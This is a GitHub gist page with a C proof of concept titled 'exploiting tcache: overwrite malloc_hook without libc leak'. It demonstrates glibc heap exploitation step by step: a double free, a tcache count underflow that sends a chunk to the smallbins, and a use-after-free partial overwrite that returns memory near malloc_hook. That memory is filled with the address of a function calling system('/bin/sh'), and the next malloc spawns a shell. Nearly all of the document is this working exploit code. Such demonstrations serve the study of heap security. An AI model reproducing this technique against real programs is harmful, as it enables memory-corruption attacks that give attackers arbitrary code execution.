Created
April 15, 2019 14:46
-
-
Save d4em0n/d468d726f06b0fa93747e193628b5ce4 to your computer and use it in GitHub Desktop.
exploiting tcache: overwrite malloc_hook without libc leak
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| void setbff(void) | |
| { | |
| setvbuf(stdin,(char *)0x0,2,0); | |
| setvbuf(stdout,(char *)0x0,2,0); | |
| setvbuf(stderr,(char *)0x0,2,0); | |
| return; | |
| } | |
| void shell(void) { | |
| system("/bin/sh"); | |
| } | |
| int main(int argc, const char *argv[]) | |
| { | |
| char *a, *b; | |
| void **c; | |
| // i don't know, but it's only works with buffer disabled | |
| setbff(); | |
| a = malloc(0xf1); | |
| printf("a = malloc(0xf1) => %p\n", a); | |
| malloc(0x31); | |
| printf("(double free required)\n"); | |
| printf("free(%p) // tcache_count=1\n", a); | |
| free(a); | |
| printf("free(%p) // tcache_count=2\n", a); | |
| free(a); | |
| printf("malloc(0xf1) => %p // tcache_count=1\n",malloc(0xf1)); | |
| printf("malloc(0xf1) => %p // tcache_count=0\n",malloc(0xf1)); | |
| printf("malloc(0xf1) => %p // tcache_count=255\n",malloc(0xf1)); | |
| printf("now tcache is full, next free() will end up in smallbins\n"); | |
| printf("free(a)\n"); | |
| free(a); | |
| printf("(use after free required)\n"); | |
| printf("overwrite first byte of a to '\\x00' so we get pointer before malloc_hook\n"); | |
| *a = '\x00'; | |
| malloc(0xf1); | |
| c = malloc(0xf1); | |
| printf("c = malloc(0xf1) => %p\n", c); | |
| printf("write 0xf0 byte to c with shell address function\n"); | |
| for(int i = 0; i <= 0xf0; i += 8) { | |
| *(&c[i/8]) = &shell; | |
| } | |
| printf("Triggering malloc\n"); | |
| malloc(0x31); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment